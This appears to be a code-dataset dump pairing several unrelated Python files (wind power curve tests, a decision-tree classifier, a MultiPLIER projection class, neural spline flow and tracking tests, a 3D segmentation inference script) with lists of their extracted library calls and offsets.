# Raise TypeError if wind farm efficiency is of wrong type
with pytest.raises(TypeError):
parameters['wind_farm_efficiency'] = 1
wake_losses_to_power_curve(**parameters)
if __name__ == "__main__":
test = TestPowerCurves()
test.setup_class()
test.test_smooth_power_curve()
test.test_wake_losses_to_power_curve()
|
[
"windpowerlib.power_curves.smooth_power_curve",
"windpowerlib.wind_turbine.WindTurbine",
"windpowerlib.power_curves.wake_losses_to_power_curve",
"pytest.raises",
"numpy.arange",
"pandas.Series",
"pandas.concat"
] |
[((1218, 1274), 'pandas.Series', 'pd.Series', (['[6.0, 7.0, 8.0, 9.0, 10.0]'], {'name': '"""wind_speed"""'}), "([6.0, 7.0, 8.0, 9.0, 10.0], name='wind_speed')\n", (1227, 1274), True, 'import pandas as pd\n'), ((1344, 1473), 'pandas.Series', 'pd.Series', (['[1141906.9806766496, 1577536.8085282773, 1975480.993355767, \n 2314059.4022704284, 2590216.6802602503]'], {'name': '"""value"""'}), "([1141906.9806766496, 1577536.8085282773, 1975480.993355767, \n 2314059.4022704284, 2590216.6802602503], name='value')\n", (1353, 1473), True, 'import pandas as pd\n'), ((1651, 1670), 'numpy.arange', 'np.arange', (['(5)', '(10)', '(1)'], {}), '(5, 10, 1)\n', (1660, 1670), True, 'import numpy as np\n'), ((1926, 2054), 'pandas.Series', 'pd.Series', (['[929405.1348918702, 1395532.5468724659, 1904826.6851982325, \n 2402659.118305521, 2844527.1732449625]'], {'name': '"""value"""'}), "([929405.1348918702, 1395532.5468724659, 1904826.6851982325, \n 2402659.118305521, 2844527.1732449625], name='value')\n", (1935, 2054), True, 'import pandas as pd\n'), ((2232, 2251), 'numpy.arange', 'np.arange', (['(5)', '(10)', '(1)'], {}), '(5, 10, 1)\n', (2241, 2251), True, 'import numpy as np\n'), ((607, 642), 'windpowerlib.wind_turbine.WindTurbine', 'wt.WindTurbine', ([], {}), '(**self.test_turbine)\n', (621, 642), True, 'import windpowerlib.wind_turbine as wt\n'), ((944, 969), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (957, 969), False, 'import pytest\n'), ((1060, 1092), 'windpowerlib.power_curves.smooth_power_curve', 'smooth_power_curve', ([], {}), '(**parameters)\n', (1078, 1092), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((2421, 2446), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2434, 2446), False, 'import pytest\n'), ((2527, 2559), 'windpowerlib.power_curves.smooth_power_curve', 'smooth_power_curve', ([], {}), '(**parameters)\n', (2545, 2559), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((2629, 2664), 'windpowerlib.wind_turbine.WindTurbine', 'wt.WindTurbine', ([], {}), '(**self.test_turbine)\n', (2643, 2664), True, 'import windpowerlib.wind_turbine as wt\n'), ((3057, 3097), 'windpowerlib.power_curves.wake_losses_to_power_curve', 'wake_losses_to_power_curve', ([], {}), '(**parameters)\n', (3083, 3097), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((3949, 3989), 'windpowerlib.power_curves.wake_losses_to_power_curve', 'wake_losses_to_power_curve', ([], {}), '(**parameters)\n', (3975, 3989), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((4116, 4140), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (4129, 4140), False, 'import pytest\n'), ((4205, 4245), 'windpowerlib.power_curves.wake_losses_to_power_curve', 'wake_losses_to_power_curve', ([], {}), '(**parameters)\n', (4231, 4245), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((1541, 1601), 'pandas.concat', 'pd.concat', (['[wind_speed_values_exp, power_values_exp]'], {'axis': '(1)'}), '([wind_speed_values_exp, power_values_exp], axis=1)\n', (1550, 1601), True, 'import pandas as pd\n'), ((1698, 1730), 'windpowerlib.power_curves.smooth_power_curve', 'smooth_power_curve', ([], {}), '(**parameters)\n', (1716, 1730), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((2135, 2195), 'pandas.concat', 'pd.concat', (['[wind_speed_values_exp, power_values_exp]'], {'axis': '(1)'}), '([wind_speed_values_exp, power_values_exp], axis=1)\n', (2144, 2195), True, 'import pandas as pd\n'), ((2279, 2311), 'windpowerlib.power_curves.smooth_power_curve', 'smooth_power_curve', ([], {}), '(**parameters)\n', (2297, 2311), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((3313, 3477), 'pandas.Series', 'pd.Series', (['[1.0, 1.0, 1.0, 0.84, 0.85, 0.86, 0.85, 0.85, 0.85, 0.86, 0.87, 0.89, 0.92,\n 0.95, 0.95, 0.96, 0.99, 0.95, 0.98, 0.97, 0.99, 1.0, 1.0, 1.0, 1.0]'], {}), '([1.0, 1.0, 1.0, 0.84, 0.85, 0.86, 0.85, 0.85, 0.85, 0.86, 0.87, \n 0.89, 0.92, 0.95, 0.95, 0.96, 0.99, 0.95, 0.98, 0.97, 0.99, 1.0, 1.0, \n 1.0, 1.0])\n', (3322, 3477), True, 'import pandas as pd\n'), ((3268, 3287), 'numpy.arange', 'np.arange', (['(1)', '(26)', '(1)'], {}), '(1, 26, 1)\n', (3277, 3287), True, 'import numpy as np\n')]
|
import numpy as np
# Was told built-in libraries are acceptable.
from collections import Counter
class Node:
def __init__(self, left=None, right=None,
best_feature=None, threshold=None, value=None):
self.left = left
self.right = right
self.best_feature = best_feature
self.threshold = threshold
self.value = value
def is_node_leaf(self):
"""Determines if node is a leaf node."""
return self.value is not None
class Classifier:
def __init__(self, max_depth=5):
self.root = None
self.max_depth = max_depth
def fit(self, X, y):
self.root = self._make_split(X, y)
return self
def predict(self, X):
"""Makes prediction by traversing down our decision tree."""
return np.array(([self._make_prediction(feature, self.root)
for feature in X]))
def _make_split(self, X, y, depth=0):
# Set our number of features according to feature input shape.
num_features = X.shape[1]
num_labels = len(np.unique(y)) # How many unique labels?
# Check if base case is met:
# Maximum depth has been reached or only one label
if depth >= self.max_depth or num_labels == 1:
leaf_value = self._most_common(y)
return Node(value=leaf_value) # Create leaf node if so.
# Select trandom indices
random_features = np.random.choice(num_features,
num_features, replace=False)
# Use greedy search to find our best available split.
best_feature, threshold = self._find_best(X, y, random_features)
# Determine left and right indices.
left_idx, right_idx = self._what_splits(X[:, best_feature], threshold)
# Recursively make splits until base case met; change depth.
left = self._make_split(X[left_idx, :], y[left_idx], depth+1)
right = self._make_split(X[right_idx, :], y[right_idx], depth+1)
return Node(left, right, best_feature, threshold)
def _find_best(self, X, y, feature_indices):
# Define default values for best gain, index, and threshold.
best_gain = -1
split_index = None
split_threshold = None
# Iterate through list of feature indices.
for index in feature_indices:
# Set the selected column
X_column = X[:, index]
thresholds = np.unique(X_column) # Determine unique values.
for threshold in thresholds:
# Iterate through and calculate the information gain.
gain = self._calculate_information_gain(X_column, y, threshold)
# Figure out the best gain, define the split index/threshold if
# the current gain is greater than our best gain, and define it
# as our new best gain.
if gain > best_gain:
best_gain = gain
split_index = index
split_threshold = threshold
return split_index, split_threshold
def _what_splits(self, X, split_threshold):
# Split should be left if X <= our threshold.
left = np.argwhere(X <= split_threshold).flatten()
# Split should be right if X > our threshold.
right = np.argwhere(X > split_threshold).flatten()
return left, right
def _calculate_entropy(self, y):
histo = np.bincount(y) # Counts occurence of each element
ps = histo / len(y)
# List comprehension; calculate entropy.
return -np.sum([p * np.log2(p) for p in ps if p > 0])
def _calculate_information_gain(self, X, y, split_threshold):
# Calculate entropy of the parent
parent_entropy = self._calculate_entropy(y)
# Determine the left and right values.
left, right = self._what_splits(X, split_threshold)
# Confirm there's information gain.
if len(left) == 0 or len(right) == 0:
return 0
# For calculation of weighted average.
num = len(y)
num_left, num_right = len(left), len(right)
# Calculate the entropy for the left side, as well as the right.
entropy_left = self._calculate_entropy(y[left])
entropy_right = self._calculate_entropy(y[right])
# Determine the weighted average of the entropy of our children.
child_entropy = ((num_left/num) * entropy_left +
(num_right/num) * entropy_right)
# Subtract this entropy from our parent to get our information gain.
information_gain = parent_entropy - child_entropy
return information_gain
def _most_common(self, y):
counter = Counter(y)
most_common = counter.most_common(1)[0][0]
return most_common
def _make_prediction(self, X, node):
# Check if the node is a leaf. If it is, return its value.
if node.is_node_leaf():
return node.value
# Otherwise, traverse down the decision tree.
if X[node.best_feature] <= node.threshold:
return self._make_prediction(X, node.left)
else:
return self._make_prediction(X, node.right)
|
[
"numpy.log2",
"numpy.random.choice",
"numpy.argwhere",
"collections.Counter",
"numpy.bincount",
"numpy.unique"
] |
[((1449, 1508), 'numpy.random.choice', 'np.random.choice', (['num_features', 'num_features'], {'replace': '(False)'}), '(num_features, num_features, replace=False)\n', (1465, 1508), True, 'import numpy as np\n'), ((3475, 3489), 'numpy.bincount', 'np.bincount', (['y'], {}), '(y)\n', (3486, 3489), True, 'import numpy as np\n'), ((4761, 4771), 'collections.Counter', 'Counter', (['y'], {}), '(y)\n', (4768, 4771), False, 'from collections import Counter\n'), ((1082, 1094), 'numpy.unique', 'np.unique', (['y'], {}), '(y)\n', (1091, 1094), True, 'import numpy as np\n'), ((2471, 2490), 'numpy.unique', 'np.unique', (['X_column'], {}), '(X_column)\n', (2480, 2490), True, 'import numpy as np\n'), ((3237, 3270), 'numpy.argwhere', 'np.argwhere', (['(X <= split_threshold)'], {}), '(X <= split_threshold)\n', (3248, 3270), True, 'import numpy as np\n'), ((3351, 3383), 'numpy.argwhere', 'np.argwhere', (['(X > split_threshold)'], {}), '(X > split_threshold)\n', (3362, 3383), True, 'import numpy as np\n'), ((3631, 3641), 'numpy.log2', 'np.log2', (['p'], {}), '(p)\n', (3638, 3641), True, 'import numpy as np\n')]
|
"""
Classes and code with MultiPLIER related functionality.
"""
import conf
import numpy as np
import pandas as pd
class MultiplierProjection(object):
"""Projects new data into the MultiPLIER latent space."""
def __init__(self):
pass
def transform(
self,
y: pd.DataFrame,
multiplier_compatible: bool = True,
) -> pd.DataFrame:
"""Projects a gene dataset into the MultiPLIER model.
This code is a reimplementation in Python of the function GetNewDataB
(https://github.com/greenelab/multi-plier/blob/v0.2.0/util/plier_util.R),
more suitable and convenient for the PhenoPLIER project (almost entirely
written in Python).
It basically row-normalizes (z-score) the given dataset, keeps only the
genes in common with the MultiPLIER model, and adds the missing ones as
zeros (mean).
Args:
y:
The new data to be projected. Gene symbols are expected in rows.
The columns could be conditions/samples, but in the PhenoPLIER
context they could also be traits/diseases or perturbations
(Connectivity Map).
multiplier_compatible:
If True, it will try to be fully compatible with the GetNewDataB
function in some situations (for instance, if the new data
contains NaNs).
Returns:
A pandas.DataFrame with the projection of the input data into the
MultiPLIER latent space. The latent variables of the MultiPLIER
model are in rows, and the columns are those of the input data
(conditions, traits, drugs, etc).
"""
z = self._read_model_z()
metadata = self._read_model_metadata()
# nothing special is done if the input data contains NaNs, but it will
# raise a warning for the user.
if y.isna().any().any():
import warnings
warnings.warn("Input data contains NaN values.")
# if multiplier_compatible, just mimic the same behavior of function
# GetNewDataB and return a DataFrame of NaN values.
if multiplier_compatible:
return pd.DataFrame(
data=np.nan,
index=z.columns.copy(),
columns=y.columns.copy(),
)
# if given data has Ensembl ID genes, then convert z genes to that
if y.index[0].startswith("ENSG"):
from entity import Gene
z = z.rename(index=Gene.GENE_NAME_TO_ID_MAP)
# row-standardize the data with z-score
y_std = y.sub(y.mean(1), axis=0).div(y.std(1), axis=0)
model_genes = z.index
data_genes = y_std.index
common_genes = model_genes.intersection(data_genes)
# select from input data only genes in common with model, and add missing ones
# as zeros (mean).
y_std = y_std.loc[common_genes].append(
pd.DataFrame(
0,
index=model_genes.difference(data_genes),
columns=y_std.columns.copy(),
)
)
# get the precision matrix of gene loadings (z matrix)
z_cov_inv = pd.DataFrame(
data=np.linalg.pinv(z.T.dot(z) + metadata["L2"] * np.identity(z.shape[1])),
index=z.columns.copy(),
columns=z.columns.copy(),
)
# perform final matrix multiplication: (z^T z + l2 I)^{-1} z^T Y
return z_cov_inv.dot(z.T).dot(y_std)
@staticmethod
def _read_model_z():
"""Returns the MultiPLIER Z matrix (gene loadings)."""
return pd.read_pickle(conf.MULTIPLIER["MODEL_Z_MATRIX_FILE"])
@staticmethod
def _read_model_metadata():
"""Returns metadata of the MultiPLIER model."""
return pd.read_pickle(conf.MULTIPLIER["MODEL_METADATA_FILE"])
|
[
"pandas.read_pickle",
"warnings.warn",
"numpy.identity"
] |
[((3704, 3758), 'pandas.read_pickle', 'pd.read_pickle', (["conf.MULTIPLIER['MODEL_Z_MATRIX_FILE']"], {}), "(conf.MULTIPLIER['MODEL_Z_MATRIX_FILE'])\n", (3718, 3758), True, 'import pandas as pd\n'), ((3881, 3935), 'pandas.read_pickle', 'pd.read_pickle', (["conf.MULTIPLIER['MODEL_METADATA_FILE']"], {}), "(conf.MULTIPLIER['MODEL_METADATA_FILE'])\n", (3895, 3935), True, 'import pandas as pd\n'), ((1998, 2046), 'warnings.warn', 'warnings.warn', (['"""Input data contains NaN values."""'], {}), "('Input data contains NaN values.')\n", (2011, 2046), False, 'import warnings\n'), ((3353, 3376), 'numpy.identity', 'np.identity', (['z.shape[1]'], {}), '(z.shape[1])\n', (3364, 3376), True, 'import numpy as np\n')]
|
import numpy as np
def softmax(a):
return np.exp(a) / np.sum(np.exp(a))
input_a = np.array([-3, -1.5, 0.3, 0.6, 1, 1.8, 3])
print(np.round(softmax(input_a), 3))
|
[
"numpy.array",
"numpy.exp"
] |
[((88, 129), 'numpy.array', 'np.array', (['[-3, -1.5, 0.3, 0.6, 1, 1.8, 3]'], {}), '([-3, -1.5, 0.3, 0.6, 1, 1.8, 3])\n', (96, 129), True, 'import numpy as np\n'), ((47, 56), 'numpy.exp', 'np.exp', (['a'], {}), '(a)\n', (53, 56), True, 'import numpy as np\n'), ((66, 75), 'numpy.exp', 'np.exp', (['a'], {}), '(a)\n', (72, 75), True, 'import numpy as np\n')]
|
import tensorflow as tf
import numpy as np
import scipy.io as scio
import os
import sys
import random
import network
import math
CATEGORY_NAME = ['Backpack', 'Basket', 'Bathtub', 'Bed', 'Bench', 'Bicycle', 'Bowl', 'Chair', 'Cup', 'Desk', 'DryingRack', 'Handcart',
'Hanger', 'Hook', 'Lamp', 'Laptop', 'Shelf', 'Sink', 'Sofa', 'Stand', 'Stool', 'Stroller', 'Table', 'Tvbench', 'Vase']
FUNC_LABEL_NUM = 18
BATCH_SIZE = 1
MODEL = '../../Model/iSEG/full/model.ckpt'
DATA_IO = '../../DATA/label/labelMat'
DATA_SCE = '../../Output/iGEN/full/gen'
TEST_FILE = '../../DATA/cvlist/test_0.txt'
OUTPUT_FILE = '../../Output/iSEG/full'
if not os.path.exists(OUTPUT_FILE+'/'):
os.makedirs(OUTPUT_FILE+'/')
cate_label_idx_list = scio.loadmat('../../DATA/label/interactionLabel.mat')
cate_label_idx_list = np.squeeze(cate_label_idx_list['categoryLabelIdx'])
# add noise
def dataAug(input, weight = 1.0):
dim = input.shape[0]
c = input.shape[-1]
data = np.random.rand(dim,dim,dim,c)
out = data + input * weight
f_s = np.sum(out, axis=-1, keepdims=True)
return out/f_s
print("Loading data...")
dataSce = {}
dataBinary = {}
for model in os.listdir(DATA_SCE):
data = scio.loadmat(DATA_SCE + '/' + model)
data = data['instances']
data = np.reshape(data.data, [64,64,64,3])
dataSce[model] = data
data = np.argmax(data,-1)
binaryData = np.zeros((64,64,64,2))
free = np.zeros((64,64,64))
central = np.zeros((64,64,64))
free[data==2]=1
central[data==0]=1
binaryData[:,:,:,0] = central
binaryData[:,:,:,1] = free
dataBinary[model] = binaryData
testList = []
f = open(TEST_FILE)
lines = f.readlines()
for line in lines:
model_x = line.split('\n')[0]+'_rec_sce_4seg.mat'
temp = np.zeros(25,dtype=np.int32)
label = line.split('_')[0]
label_idx_list = []
label_idx = np.zeros(FUNC_LABEL_NUM+2,dtype=np.int32)
for i in range(25):
if CATEGORY_NAME[i] == label:
temp[i] = 1
label_idx_list = np.squeeze(cate_label_idx_list[i])
break
if label == 'Backpack':
label_idx_list = [1]
for idx in label_idx_list:
label_idx[idx] = 1
label_idx[0] = 1
label_idx[-1] = 1
testList.append([model_x,temp,label_idx])
f.close()
print("dataSce loaded")
# setup network
iSEG = network.iSEG(BATCH_SIZE)
sess = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=tf.GPUOptions(allow_growth=True)))
tf.global_variables_initializer().run()
model_ckpt = MODEL + '.index'
print(MODEL)
if os.path.isfile(model_ckpt):
print('model.ckpt file found')
else:
print('model file not found, quit.')
exit()
saver = tf.train.Saver()
saver.restore(sess, MODEL)
print('Model restored')
x = np.random.rand(BATCH_SIZE, 64, 64, 64, 3)
x_binary = np.random.rand(BATCH_SIZE, 64, 64, 64, 2)
label = np.random.rand(BATCH_SIZE, 25)
label_idx = np.random.rand(BATCH_SIZE, FUNC_LABEL_NUM + 2)
for i in range(len(testList)):
model_x, label_, label_idx_ = testList[i]
x[0, :, :, :, :] = dataSce[model_x]
x_binary[0, :, :, :, :] = dataBinary[model_x]
label[0] = label_
label_idx[0] = label_idx_
result = sess.run([iSEG.x_rec], feed_dict = {iSEG.x: x, iSEG.x_binary:x_binary, iSEG.label:label})
result = np.reshape(result, [64, 64, 64, FUNC_LABEL_NUM + 2])
# for refine
# if not os.path.exists(OUTPUT_FILE+'/refine/'):
# os.makedirs(OUTPUT_FILE+'/refine/')
# scio.savemat(OUTPUT_FILE+'/refine/'+model_x[0:-4]+'_label_refine.mat', {'instances':result})
# for visual
label_sce = np.argmax(result,-1)+1
label_max = np.amax(label_sce)
label_sce[label_sce==label_max] = 0
if not os.path.exists(OUTPUT_FILE + '/visual/'):
os.makedirs(OUTPUT_FILE + '/visual/')
scio.savemat(OUTPUT_FILE + '/visual/'+model_x[0:-4] + '_label.mat', {'instances':label_sce.astype(np.int8)})
|
[
"numpy.sum",
"os.makedirs",
"tensorflow.train.Saver",
"scipy.io.loadmat",
"numpy.random.rand",
"numpy.argmax",
"network.iSEG",
"tensorflow.global_variables_initializer",
"os.path.exists",
"numpy.zeros",
"numpy.amax",
"os.path.isfile",
"numpy.reshape",
"numpy.squeeze",
"tensorflow.GPUOptions",
"os.listdir"
] |
[((725, 778), 'scipy.io.loadmat', 'scio.loadmat', (['"""../../DATA/label/interactionLabel.mat"""'], {}), "('../../DATA/label/interactionLabel.mat')\n", (737, 778), True, 'import scipy.io as scio\n'), ((801, 852), 'numpy.squeeze', 'np.squeeze', (["cate_label_idx_list['categoryLabelIdx']"], {}), "(cate_label_idx_list['categoryLabelIdx'])\n", (811, 852), True, 'import numpy as np\n'), ((1138, 1158), 'os.listdir', 'os.listdir', (['DATA_SCE'], {}), '(DATA_SCE)\n', (1148, 1158), False, 'import os\n'), ((2186, 2210), 'network.iSEG', 'network.iSEG', (['BATCH_SIZE'], {}), '(BATCH_SIZE)\n', (2198, 2210), False, 'import network\n'), ((2396, 2422), 'os.path.isfile', 'os.path.isfile', (['model_ckpt'], {}), '(model_ckpt)\n', (2410, 2422), False, 'import os\n'), ((2525, 2541), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (2539, 2541), True, 'import tensorflow as tf\n'), ((2598, 2639), 'numpy.random.rand', 'np.random.rand', (['BATCH_SIZE', '(64)', '(64)', '(64)', '(3)'], {}), '(BATCH_SIZE, 64, 64, 64, 3)\n', (2612, 2639), True, 'import numpy as np\n'), ((2651, 2692), 'numpy.random.rand', 'np.random.rand', (['BATCH_SIZE', '(64)', '(64)', '(64)', '(2)'], {}), '(BATCH_SIZE, 64, 64, 64, 2)\n', (2665, 2692), True, 'import numpy as np\n'), ((2701, 2731), 'numpy.random.rand', 'np.random.rand', (['BATCH_SIZE', '(25)'], {}), '(BATCH_SIZE, 25)\n', (2715, 2731), True, 'import numpy as np\n'), ((2744, 2790), 'numpy.random.rand', 'np.random.rand', (['BATCH_SIZE', '(FUNC_LABEL_NUM + 2)'], {}), '(BATCH_SIZE, FUNC_LABEL_NUM + 2)\n', (2758, 2790), True, 'import numpy as np\n'), ((639, 672), 'os.path.exists', 'os.path.exists', (["(OUTPUT_FILE + '/')"], {}), "(OUTPUT_FILE + '/')\n", (653, 672), False, 'import os\n'), ((673, 703), 'os.makedirs', 'os.makedirs', (["(OUTPUT_FILE + '/')"], {}), "(OUTPUT_FILE + '/')\n", (684, 703), False, 'import os\n'), ((951, 983), 'numpy.random.rand', 'np.random.rand', (['dim', 'dim', 'dim', 'c'], {}), '(dim, dim, dim, c)\n', (965, 983), True, 'import numpy as np\n'), ((1018, 1053), 'numpy.sum', 'np.sum', (['out'], {'axis': '(-1)', 'keepdims': '(True)'}), '(out, axis=-1, keepdims=True)\n', (1024, 1053), True, 'import numpy as np\n'), ((1168, 1204), 'scipy.io.loadmat', 'scio.loadmat', (["(DATA_SCE + '/' + model)"], {}), "(DATA_SCE + '/' + model)\n", (1180, 1204), True, 'import scipy.io as scio\n'), ((1239, 1277), 'numpy.reshape', 'np.reshape', (['data.data', '[64, 64, 64, 3]'], {}), '(data.data, [64, 64, 64, 3])\n', (1249, 1277), True, 'import numpy as np\n'), ((1307, 1326), 'numpy.argmax', 'np.argmax', (['data', '(-1)'], {}), '(data, -1)\n', (1316, 1326), True, 'import numpy as np\n'), ((1340, 1365), 'numpy.zeros', 'np.zeros', (['(64, 64, 64, 2)'], {}), '((64, 64, 64, 2))\n', (1348, 1365), True, 'import numpy as np\n'), ((1371, 1393), 'numpy.zeros', 'np.zeros', (['(64, 64, 64)'], {}), '((64, 64, 64))\n', (1379, 1393), True, 'import numpy as np\n'), ((1403, 1425), 'numpy.zeros', 'np.zeros', (['(64, 64, 64)'], {}), '((64, 64, 64))\n', (1411, 1425), True, 'import numpy as np\n'), ((1687, 1715), 'numpy.zeros', 'np.zeros', (['(25)'], {'dtype': 'np.int32'}), '(25, dtype=np.int32)\n', (1695, 1715), True, 'import numpy as np\n'), ((1777, 1821), 'numpy.zeros', 'np.zeros', (['(FUNC_LABEL_NUM + 2)'], {'dtype': 'np.int32'}), '(FUNC_LABEL_NUM + 2, dtype=np.int32)\n', (1785, 1821), True, 'import numpy as np\n'), ((3105, 3157), 'numpy.reshape', 'np.reshape', (['result', '[64, 64, 64, FUNC_LABEL_NUM + 2]'], {}), '(result, [64, 64, 64, FUNC_LABEL_NUM + 2])\n', (3115, 3157), True, 'import numpy as np\n'), ((3426, 3444), 'numpy.amax', 'np.amax', (['label_sce'], {}), '(label_sce)\n', (3433, 3444), True, 'import numpy as np\n'), ((2309, 2342), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (2340, 2342), True, 'import tensorflow as tf\n'), ((3390, 3411), 'numpy.argmax', 'np.argmax', (['result', '(-1)'], {}), '(result, -1)\n', (3399, 3411), True, 'import numpy as np\n'), ((3490, 3530), 'os.path.exists', 'os.path.exists', (["(OUTPUT_FILE + '/visual/')"], {}), "(OUTPUT_FILE + '/visual/')\n", (3504, 3530), False, 'import os\n'), ((3534, 3571), 'os.makedirs', 'os.makedirs', (["(OUTPUT_FILE + '/visual/')"], {}), "(OUTPUT_FILE + '/visual/')\n", (3545, 3571), False, 'import os\n'), ((1907, 1941), 'numpy.squeeze', 'np.squeeze', (['cate_label_idx_list[i]'], {}), '(cate_label_idx_list[i])\n', (1917, 1941), True, 'import numpy as np\n'), ((2274, 2306), 'tensorflow.GPUOptions', 'tf.GPUOptions', ([], {'allow_growth': '(True)'}), '(allow_growth=True)\n', (2287, 2306), True, 'import tensorflow as tf\n')]
|
# -*- coding: utf-8 -*-
"""
Tests for neural spline flows.
"""
import numpy as np
import pytest
import torch
from glasflow.flows import CouplingNSF
@pytest.mark.parametrize("num_bins", [4, 10])
def test_coupling_nsf_init(num_bins):
"""Test the initialise method"""
CouplingNSF(2, 2, num_bins=num_bins)
@pytest.mark.integration_test
def test_coupling_nsf_forward_inverse():
"""Make sure the flow is invertible"""
x = torch.randn(10, 2)
flow = CouplingNSF(2, 2)
with torch.no_grad():
x_prime, log_prob = flow.forward(x)
x_out, log_prob_inv = flow.inverse(x_prime)
np.testing.assert_array_almost_equal(x, x_out)
np.testing.assert_array_almost_equal(log_prob, -log_prob_inv)
|
[
"torch.randn",
"glasflow.flows.CouplingNSF",
"pytest.mark.parametrize",
"numpy.testing.assert_array_almost_equal",
"torch.no_grad"
] |
[((152, 196), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""num_bins"""', '[4, 10]'], {}), "('num_bins', [4, 10])\n", (175, 196), False, 'import pytest\n'), ((276, 312), 'glasflow.flows.CouplingNSF', 'CouplingNSF', (['(2)', '(2)'], {'num_bins': 'num_bins'}), '(2, 2, num_bins=num_bins)\n', (287, 312), False, 'from glasflow.flows import CouplingNSF\n'), ((437, 455), 'torch.randn', 'torch.randn', (['(10)', '(2)'], {}), '(10, 2)\n', (448, 455), False, 'import torch\n'), ((467, 484), 'glasflow.flows.CouplingNSF', 'CouplingNSF', (['(2)', '(2)'], {}), '(2, 2)\n', (478, 484), False, 'from glasflow.flows import CouplingNSF\n'), ((613, 659), 'numpy.testing.assert_array_almost_equal', 'np.testing.assert_array_almost_equal', (['x', 'x_out'], {}), '(x, x_out)\n', (649, 659), True, 'import numpy as np\n'), ((664, 725), 'numpy.testing.assert_array_almost_equal', 'np.testing.assert_array_almost_equal', (['log_prob', '(-log_prob_inv)'], {}), '(log_prob, -log_prob_inv)\n', (700, 725), True, 'import numpy as np\n'), ((495, 510), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (508, 510), False, 'import torch\n')]
|
import numpy as np
import pandas as pd
import pytest
from locan import LocData
from locan.dependencies import HAS_DEPENDENCY
if HAS_DEPENDENCY["trackpy"]:
from trackpy import quiet as tp_quiet
from locan.data.tracking import link_locdata, track
pytestmark = pytest.mark.skipif(
not HAS_DEPENDENCY["trackpy"], reason="requires trackpy"
)
if HAS_DEPENDENCY["trackpy"]:
tp_quiet() # same as: trackpy.logger.setLevel(logging.WARN)
@pytest.fixture()
def locdata_simple():
dict_ = {
"position_x": [0, 1, 2, 10, 20, 21, 30, 4],
"position_y": [0, 1, 2, 10, 20, 21, 30, 4],
"position_z": [0, 1, 2, 10, 20, 21, 30, 4],
"frame": np.arange(8),
}
return LocData(dataframe=pd.DataFrame.from_dict(dict_))
def test_link_locdata(locdata_simple):
track_series = link_locdata(locdata_simple, search_range=5, memory=0)
assert len(track_series) == 8
assert track_series.name == "track"
def test_track(locdata_simple):
locdata_new, track_series = track(locdata_simple, search_range=5)
# print(locdata_new.data)
assert "frame" in locdata_new.data.columns
assert len(locdata_new) == 5
locdata_new, track_series = track(locdata_simple, search_range=5, memory=5)
# print(locdata_new.data)
assert len(locdata_new) == 4
|
[
"pandas.DataFrame.from_dict",
"trackpy.quiet",
"pytest.fixture",
"pytest.mark.skipif",
"numpy.arange",
"locan.data.tracking.link_locdata",
"locan.data.tracking.track"
] |
[((271, 347), 'pytest.mark.skipif', 'pytest.mark.skipif', (["(not HAS_DEPENDENCY['trackpy'])"], {'reason': '"""requires trackpy"""'}), "(not HAS_DEPENDENCY['trackpy'], reason='requires trackpy')\n", (289, 347), False, 'import pytest\n'), ((453, 469), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (467, 469), False, 'import pytest\n'), ((389, 399), 'trackpy.quiet', 'tp_quiet', ([], {}), '()\n', (397, 399), True, 'from trackpy import quiet as tp_quiet\n'), ((819, 873), 'locan.data.tracking.link_locdata', 'link_locdata', (['locdata_simple'], {'search_range': '(5)', 'memory': '(0)'}), '(locdata_simple, search_range=5, memory=0)\n', (831, 873), False, 'from locan.data.tracking import link_locdata, track\n'), ((1014, 1051), 'locan.data.tracking.track', 'track', (['locdata_simple'], {'search_range': '(5)'}), '(locdata_simple, search_range=5)\n', (1019, 1051), False, 'from locan.data.tracking import link_locdata, track\n'), ((1194, 1241), 'locan.data.tracking.track', 'track', (['locdata_simple'], {'search_range': '(5)', 'memory': '(5)'}), '(locdata_simple, search_range=5, memory=5)\n', (1199, 1241), False, 'from locan.data.tracking import link_locdata, track\n'), ((679, 691), 'numpy.arange', 'np.arange', (['(8)'], {}), '(8)\n', (688, 691), True, 'import numpy as np\n'), ((728, 757), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['dict_'], {}), '(dict_)\n', (750, 757), True, 'import pandas as pd\n')]
|
import os
import logging
import glob
import yaml
import joblib
import numpy as np
from mathtools import utils
from kinemparse import airplanecorpus
logger = logging.getLogger(__name__)
def makeBinLabels(action_labels, part_idxs_to_bins, num_samples):
no_bin = part_idxs_to_bins[0] # 0 is the index of the null part
bin_labels = np.full(num_samples, no_bin, dtype=int)
for part_index, start_index, end_index in action_labels:
bin_index = part_idxs_to_bins[part_index]
bin_labels[start_index:end_index + 1] = bin_index
return bin_labels
def main(
out_dir=None, hand_detections_dir=None, labels_dir=None,
plot_output=None, results_file=None, sweep_param_name=None):
hand_detections_dir = os.path.expanduser(hand_detections_dir)
labels_dir = os.path.expanduser(labels_dir)
out_dir = os.path.expanduser(out_dir)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
out_data_dir = os.path.join(out_dir, 'data')
if not os.path.exists(out_data_dir):
os.makedirs(out_data_dir)
fig_dir = os.path.join(out_dir, 'figures')
if not os.path.exists(fig_dir):
os.makedirs(fig_dir)
def saveVariable(var, var_name):
joblib.dump(var, os.path.join(out_data_dir, f'{var_name}.pkl'))
logger = utils.setupRootLogger(filename=os.path.join(out_dir, 'log.txt'))
logger.info(f"Reading from: {hand_detections_dir}")
logger.info(f"Writing to: {out_dir}")
if results_file is None:
results_file = os.path.join(out_dir, 'results.csv')
# write_mode = 'w'
else:
